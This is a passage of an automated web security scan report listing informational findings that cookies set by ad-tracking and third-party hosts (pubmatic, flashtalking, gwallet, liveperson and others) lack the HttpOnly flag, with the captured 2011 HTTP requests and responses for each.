The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_oo=1; ra1_uid=4711648038188259648

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 01-Oct-2012 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=DDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 02-Oct-2016 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>
14.196. http://rs.gwallet.com/r1/pixel/x914r7675757  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x914r7675757

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x914r7675757 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/ROne/ro_x914.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 248
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 02-Oct-2012 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=FDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 03-Oct-2016 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><!-- PubMatic- Exclude user - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MiZjb2RlPTIwNTQmdGw9NTE4NDAw
' width='1' height
...[SNIP]...
14.197. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=14.0.835.187&pver=2.2&wrkey=AKEgNitErWf0UFLnRnw3Az6mp57JIWbOiz4iR9gNFsjxTOQfoHIRqIpBEuaneWSYfX0d7kUgr1D2W0FMpF_cHSqPs9XEwGa4Xg== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 195
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch

goog-malware-shavar;a:37678-51238:s:50280-62140:mac
goog-phish-shavar;a:154883-165954:s:77359-81359:mac
goog-badbinurl-shavar;a:137-2537:s:61-2536:mac
goog-badbin-digestvar;a:19-1911:s:3-397:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=3dfb46e0dc07a7d7:TM=1317604332:LM=1317604332:S=S2Ouy3CEy9MxV-6M; expires=Wed, 02-Oct-2013 01:12:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:12:12 GMT
Server: Chunked Update Server
Content-Length: 686
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Expires: Mon, 03 Oct 2011 01:12:12 GMT
Cache-Control: private

m:Tr-1oiyw-IJER2A0oBF6b_mKSpU=
n:1890
i:goog-badbin-digestvar
i:goog-badbinurl-shavar
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYveUDINDlAyoH
...[SNIP]...
14.198. http://sales.liveperson.net/hc/15744040/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/15744040/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15744040/?&site=15744040&cmd=mTagKnockPage&lpCallId=482200729660-510428063105&protV=20&lpjson=1&id=2559909213&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotel-obtz3-english%7ClpMTagConfig.db3%7ClpButtonDiv3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1317600745459; expires=Tue, 04-Oct-2011 00:12:25 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 00:12:25 GMT
Set-Cookie: HumanClickSiteContainerID_15744040=STANDALONE; path=/hc/15744040
Set-Cookie: LivePersonID=-5110247826455-1317600658:-1:1317600658:-1:-1; expires=Tue, 02-Oct-2012 00:12:25 GMT; path=/hc/15744040; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1510

lpConnLib.Process({"ResultSet": {"lpCallId":"482200729660-510428063105","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
14.199. http://serve.williamhill.com/promoLoadDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.williamhill.com
Path:   /promoLoadDisplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promoLoadDisplay?member=goalcom&campaign=DEFAULT&channel=widget&zone=593986973&lp=0 HTTP/1.1
Host: serve.williamhill.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NON DEVa TAIa OUR BUS"
Set-Cookie: IMPRESSION=45034F96A3F22660E679EB55524B11CD:27523; Expires=Mon, 03-Oct-2011 23:52:05 GMT
Location: http://cacheserve.williamhill.com/promoDisplay?promoId=593986972
Content-Type: text/html; charset=utf-8
Content-Length: 0

14.200. http://servedby.flashtalking.com/click/1/16628  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /click/1/16628

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/1/16628;183799;231524;211;162480/?g=1343AC00FD7B0F&random=1244&ft_sgid=542&url=http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:58:02 GMT
Cache-Control: no-cache, no-store
Content-Length: 0
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Via: 1.1 sjc005200 (MII-APC/2.1)
Content-Type: text/plain

14.201. http://servedby.flashtalking.com/imp/1/16628  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:2-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:53:28 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 02 Oct 2011 23:53:28 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 582


var ftGUID_183799="1343AC00FD7B0F";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;li
...[SNIP]...
14.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4_0&hotel=omni_hotels&random=656365&tile=564238840132219&section=detailskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A11%3A12&ranreq=0.7082862977404147&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:12:49 GMT
Content-Length: 1910
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:12:49 GMT; path=/
Set-Cookie: _curtime=1317600769; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:22:49 GMT; path=/
Set-Cookie: camfreq_749312571=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:52:49 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:12:49 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...
14.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&prevkadIds=21557&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame22662026621&kltstamp=2011-9-2%2020%3A53%3A2&ranreq=0.7874341141432524&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x39&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:59 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:58 GMT; path=/
Set-Cookie: pubfreq_26621_21556_1478501671=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:59 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:59 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame22662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA0VAAAAAA
...[SNIP]...
14.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A1&ranreq=0.3272909566294402&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1903
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: _curtime=1317600551; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:19:11 GMT; path=/
Set-Cookie: camfreq_60531448=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: pubfreq_26072_21043_312218146=243-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...
14.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A21&ranreq=0.6788685892242938&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PMDTSHR=cat:; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1903
Date: Mon, 03 Oct 2011 00:14:32 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:32 GMT; path=/
Set-Cookie: _curtime=1317600872; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:32 GMT; path=/
Set-Cookie: camfreq_1933189234=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:32 GMT; path=/

